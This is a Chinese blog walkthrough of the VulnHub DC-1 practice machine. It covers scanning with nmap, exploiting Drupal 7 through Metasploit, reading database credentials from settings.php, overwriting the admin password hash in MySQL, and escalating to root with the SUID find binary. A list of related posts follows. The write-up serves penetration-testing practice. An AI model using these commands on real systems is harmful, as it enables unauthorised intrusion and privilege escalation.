DC-1靶场实验过程

已于 2024-09-25 14:00:58 修改
阅读量905 收藏 12
点赞数 28
文章标签: 数据库
于 2024-09-25 10:21:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84694887/article/details/142515621
版权

一、环境搭建:

1、靶机描述

DC-1是一个专门建立的脆弱实验室,目的是获得渗透测试领域的经验。它是为初学者设计的挑战,但它到底有多容易取决于你的技能和知识,以及你的学习能力。要成功完成这一挑战,您需要掌握Linux技能,熟悉Linux命令行,并具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。有多种方法可以获得根,但是,我为初学者提供了一些包含线索的标志。总共有五个flag,但最终目标是在根的主目录中找到并读取标志。您甚至不需要成为根用户来执行此操作,但是,您将需要根权限。根据您的技能水平,您可以跳过寻找大多数这些标志,然后继续直。初学者可能会遇到他们以前从未遇到过的挑战,但是谷歌搜索应该是获得完成这个挑战所需的信息所必需的。

根据描述信息我们可以知道本靶场环境总共有5个flag。

2、下载靶场环境

    靶场下载地址:

DC: 1 ~ VulnHub

二、渗透靶场

1.目标:

目标就是我们搭建的靶场,靶场IP为:XXX.XXX.XXX.XXX/24

2.先确认kali的ip地址

命令:Ipconfig

3.寻找靶机真实IP

nmap -sP 1 XXX.XXX.XXX.XXX /24

4、信息收集:探端口及服务

nmap -A -p- -v 192.168.136.129

-A 综合性扫描

-v 冗余模式。推荐使用这个选项,它给出扫描过程中的详细信息

访问web站点

发现是一个电信的drupal服务,根据nmap结果可知当前运行的是Drupal 7的CMS

searchsploit  drupal 7

还可以在百度上搜一下相关版本漏洞

5.进入MSF控制台

命令:msfconsole

MSF简单命令介绍

msfconsole 进入MSF控制台

search 搜索相应模块

use            对应模块

show options   查看信息

set RHOST   远程主机ip

run            攻击

进入MSF控制台搜索drupal模块

进入MSF控制台msfdb run

搜索drupal模块search drupal

6、用2018的测试

7.设置靶机IP运行msf

执行whoami

发现是www-date权限

进入home目录,发现flag4.txt文件

我们使用python进行反弹

python -c "import pty;pty.spawn('/bin/bash')"

查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件

8、 Drupal的默认配置文件为

/var/www/sites/default/settings.php

查看文件内容

cat /var/www/sites/default/settings.php

 发现了flag2和数据库的账号密码

flag2提示,提升权限为root来查看敏感文件

我们先进入数据库查看

'username' => 'dbuser',

'password' => 'R0ck3t',

mysql -u dbuser -p

查看数据库,切换到drupaldb数据库

9、查看默认的Drupal user 表

解决方法:置换drupal密码

10、进入www目录

站点路径下执行php scripts/password-hash.sh 新密码

11、在进入数据库中把密码字段进行替换
进入mysql,输入密码,切换到drupaldb数据库

mysql -u dbuser -pR0ck3t

use drupaldb

将pass字段进行替换

update users set pass=" $S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw " where name="admin";

update users set pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw" where name="admin";

12、登录站点

访问站点

进行登录,密码是之前我们替换的

admin

123

成功登录

13、.发现flag3

 登陆战点之后,随便翻一番,发现flag3,

http://192.168.66.140/node#overlay=admin/content

  点击flag3进入,发现提示信息

使用命令查看 suid 权限的可执行二进制程序

find / -perm -4000 2>/dev/null

发现find命令

使用命令测试,发现为root权限

命令:touch 123

ls

find / -name 123 -exec "whoami" \;

14、.发现最后的flag文件

命令:find ./ -name 123 -exec "/bin/sh" \;   

whoami

ls

cd /root

ls

查看cat thefinalflag.txt文件

QDCAU7

大致就是说你已经通过了本关卡。

小呆呆瓜瓜
关注
DC-1靶场渗透实验
Alashan12的博客
05-05 1971
一、环境准备 Kali虚拟机 DC-1靶场http://www.five86.com/downloads/DC-1.zip 首先将kali虚拟机和靶机DC1都设置为net模式 ifconfig查看kali的IP为192.168.152.128 使用nmap扫描此网段下的主机 启动DC-1靶机 再次扫描得到DC-1靶机的IP地址为192.168.152.138 二、实验过程 使用nmap针对该IP进行详细扫描 发现打开了22、80和111的端口,还开启了s...
DC-2靶场实验过程
2401_84694887的博客
09-27 832
命令:wpscan --url http://dc-2 --passwords dc2.txt。wpscan --url http://dc-2 --enumerate t 扫描主题。wpscan --url http://dc-2 --enumerate p 扫描插件。wpscan --url http://dc-2 --enumerate u 枚举用户。命令:wpscan --url http://dc-2 --enumerate u。命令:cewl http://dc-2/ -w dict.txt。
2024kali上打DC-1靶场
2301_80110280的博客
07-16 751
Current Setting是目前设置的内容 Required表示是否需要设置内容,yes为必须设置,no可以设置也可不设置 就上面来说RHOSTS需要set,但是没有内容 所以接着我们来设置一下RHOSTS内容(就是攻击目标IP地址,靶场地址)
DC-1靶场实验报告
jiaxingjia123的博客
09-25 752
DC-1靶场实验报告
DC-1靶场渗透测试实验整理
u013930899的博客
09-10 2218
DC-1实验
DC-3靶场渗透】
一纸荒芜的博客
12-12 3584
DC3靶场打靶记录!
DC-5靶场实战
qq_42754807的博客
03-28 837
DC-5靶场实战
DC-5靶场下载及渗透实战详细过程DC靶场系列)
金 帛的博客
07-30 2876
dc-5靶场详细渗透过程
DC-4靶场搭建及渗透实战详细过程DC靶场系列)
金 帛的博客
07-28 5332
dc-4靶场详细渗透过程
DC系列漏洞靶场-渗透测试学习复现(DC-2)
W983079520的博客
11-03 1861
DC-2是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了vi提权和git提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-2靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个: 80(http默认端口)和运行着SSH服务的7744端口。
DC系列漏洞靶场-渗透测试学习复现(DC-1)
W983079520的博客
11-01 2779
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的! DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip(DC后的数字可以换成1-8中任意一个) DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 DC-1提权关键词:find
Vulnhub靶机:DC-1渗透详细过程
IerkeU的博客
01-27 2805
这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。
DC系列漏洞靶场-渗透测试学习复现(DC-7)
W983079520的博客
12-10 1827
DC-7是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权和shell二次反弹。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.149为DC-7靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默
基于JavaWeb开发的Java+SpringMvc+vue+element实现驾校管理系统详细设计
央顺科技官方博客
09-24 1017
机遇与挑战始终并存。在开放的互联网平台面前,驾校预约管理系统的信息管理面临着巨大的挑战。传统的管理模式局限于简单数据的管理,无法适应不断变化的市场格局。在早期阶段,在将计算机技术和网络技术融入驾校预约管理系统数据管理方法之前,所有管理方式都通过人工操作完成了管理信息的。系统管理也都将通过计算机进行整体智能化操作,对于驾校预约管理系统所牵扯的管理及数据保存都是非常多的,举例像所有详细信息包括,管理员;首页、个人中心、学员管理、驾校教练管理、驾校车辆管理、预约管理、取消预约管理、驾校公告管理、系统管理。
点评项目-2-完善注册登录业务
最新发布
m0_75138009的博客
09-29 415
需要处理的业务:在网页发送 /user/code 路径下的 post 请求后,我们需要检验手机号后,向合法的手机号发送一个随机生成的电话号。
Java Alibaba Druid 数据库连接池
miracle的专栏
09-24 793
在Java开发中,数据库连接池是性能优化的重要一环。而作为一款强大的数据库连接池解决方案,凭借其和对多种数据库的支持,成为了许多企业级应用的首选。本篇文章将介绍Druid的核心特性,并结合不同数据库的实际用法。
JPA+Thymeleaf增删改查
y050505的博客
09-25 499
在使用JPA(Java Persistence API)和Thymeleaf作为模板引擎进行Web开发时,实现增删改查(CRUD)操作是一个常见的需求。下面,我将简要介绍如何使用Spring Boot框架结合JPA和Thymeleaf来实现这一功能。
k8s搭建一主三从的mysql8集群---无坑
oopxiajun博客专栏
09-27 900
对于构建基于MySQL的大规模、高性能应用来讲,需要使用水平扩展(集群)的数据库架构方式。在MySQL内建的复制功能可以实现,通过为服务器配置一个或多个备库的方式来进行数据同步。同时复制功能不仅有利于构建高性能的应用,也是高可用性、可扩展性、容灾、备份以及数据仓库等工作的基础。复制的基本原理是让一台服务器的数据与其他服务器保持同步。一台主库的数据可以同步到多台备库上,备库本身也可以被配置成另外一台服务器的主库。主库和备库之间可以有多种不同的组合方式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值